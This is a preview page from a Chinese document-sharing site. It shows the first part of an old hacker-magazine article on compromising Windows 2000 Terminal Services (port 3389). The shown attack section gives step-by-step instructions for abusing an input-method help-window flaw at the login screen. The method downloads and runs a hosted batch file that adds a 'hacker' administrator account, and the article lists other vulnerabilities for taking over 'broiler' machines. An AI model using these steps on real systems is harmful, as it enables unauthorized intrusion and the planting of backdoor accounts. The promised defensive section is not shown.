返回
利用管理连接到另一台计算机

利用管理连接到另一台计算机

ID:13958595

大小:46.00 KB

页数:15页

时间:2018-07-25

利用管理连接到另一台计算机_第1页
利用管理连接到另一台计算机_第2页
利用管理连接到另一台计算机_第3页
利用管理连接到另一台计算机_第4页
利用管理连接到另一台计算机_第5页
资源描述:

《利用管理连接到另一台计算机》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、利用管理连接到另一台计算机黑客X档案[利用计算机管理连接到另一台计算机(IPC$)]前言:WIN2000终端服务(TermService)是个非常好的服务,黑客喜欢用它,因为终端服务的功能之完备使任何木马后门都望尘莫及;管理员们也喜欢用它,因为终端服务可以给他的日常的维护和管理带来许多方便。于是自从三年前Win2000问世以来,网上出现了许许多多关于“WIN2000终端服务攻防”的讨论:“黑客们发表入侵终端服务的心得,网管们讨论终端服务的防御技巧”。并且这些讨论一直经久不衰,在岁月巨轮即将滚入2003年的今天,“终端服务攻防”依然是最热门的论题之一,国内许多安全论坛中依然能看到许多“如

2、何获取3389肉鸡”,“如何加固终端服务”之类的帖子。本文结合笔者自身经验,集“百家之长”地介绍一些关于“WIN2000终端服务攻防”的实用技巧和方法,全文分“黑客进攻篇”和“网管防御篇”两篇,以此献给所有“喜欢”终端服务的朋友们。黑客进攻篇此篇介绍的就是一些关于3389入侵的技巧和方法,可以看作是对终端服务入侵的总结。在进入正题前,先简单介绍一下终端服务:终端服务(TermService)是Win2000server版自带有一个基于远程桌面协议(RDP)的服务,其默认服务端口是3389。终端服务之所以一直深受黑客们的“青睐”,是因为它速度很快,性能也很稳定,通过这个服务登陆远程主机后

3、除物理上不能接触外几乎与本地操作几乎一样,一但黑客以管理员身份通过这个服务登陆远程主机后,他就几乎拥有该机的所有功能,因此黑客常常拿终端服务作为来进行控制的“后门”,甚至把开了终端服务的机子亲切地称作“3389肉鸡”。下面我们就先来看看终端服务入侵的几种常见思路和方法。一.3389终端服务入侵的几种方法方法1:输入法入侵通过Win2000中文版本全拼和郑码输入法漏洞可以用多种方法可简单取得系统控制权,笔者认为最快的、一劳永逸的方法是把要用的木马和添加用户的批处理文件先传到个人主页上,然后在跳转url时把木马和批处理文件下载下来,再启动它们就OK了。此外最近的紫光输入法也有类似漏洞,不过

4、可惜的是升级后紫光输入法也改正了这个漏洞。而且只有国内的机子才有输入法漏洞,所以此法对付不了国外主机。利用输入法漏洞具体方法有多种,这里只举一种说明,具体过程如下:1.先申请个免费网页空间,写个adu.bat文件放上去.内容如下:netuserhacker/addnetuserhacker123456netlocalgroupadministrators/addhacker当然你也可以放个你喜欢的木马上去,用一样的方法也可以启动它的。2.用superscan扫描开着3389终端服务机子,(如图1),然后用终端客户端程序mstsc.exe图1进行连接,(如图2),等跳出等录界面后,按ct

5、rl+shift调出全拼输入法或郑码,在输入条的图2右端用鼠标右键点帮助(打了补丁其帮助菜单发灰是进不了的),(如图3),点击“输入法入门”进入输入法帮助界面后,再在“选项”菜单上点右键,在跳出菜单里选“跳转到URL”,图3然后在URL中输入:http://主页IP/adu.bat,然后选择“保存到磁盘”,选择目录:c:任意文件夹。.下载完后回到帮助界面再一次“跳转到URL",输入刚才的文件夹:c:任意文件夹,找到刚才下载的adu.bat文件,单击选中它,然后点击鼠标右键选“打开”,这样执行了这个批处理文件,增加一个用户名hacker密码是123456的administrator组

6、的用户。3.用这个hacker的帐号从终端服务登录,然后就可以用图形界面“管理”这台可爱的3389肉鸡了。真的很怀念2000年输入法刚曝光的那段日子,那时候的3389入侵几乎是“攻无不克,战无不胜”,一天能收集上百台3389肉鸡。呵呵,可惜的是岁月巨轮已经快入了2003了,这种风靡一时的“傻瓜式”的入侵方法已经很老了,绝大多数的此类机子都打了补丁。如果你有足够的耐心,在一大对开了3389的机子一台台试,成功机率大概是几百分之一吧!不过也别太担心,要找3389肉鸡有的是办法,我们继续往下看。方法2:利用其他漏洞先取控制权,再从3389登陆。由于终端服务的功能强大,黑客先在网上寻找开了33

7、89的机子,看它有没有漏洞可以利用,如果有,就通过这些漏洞取得控制权后,然后再用终端服务进入。经常利用的win2000和IIS漏洞有:IPC$连接,win2000默认共享,UNICODE漏洞,ida、idq溢出漏洞,printer漏洞,ASP漏洞,FRONTPAGE扩展服务溢出,MSSQL溢出等等,具体的机子具体分析(这些漏洞具体如何利用我们这里就不具体说明了,不过笔者在下一篇《简单地获取大量3389肉鸡》一文中详细介绍了几种可以简单快速获取大

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。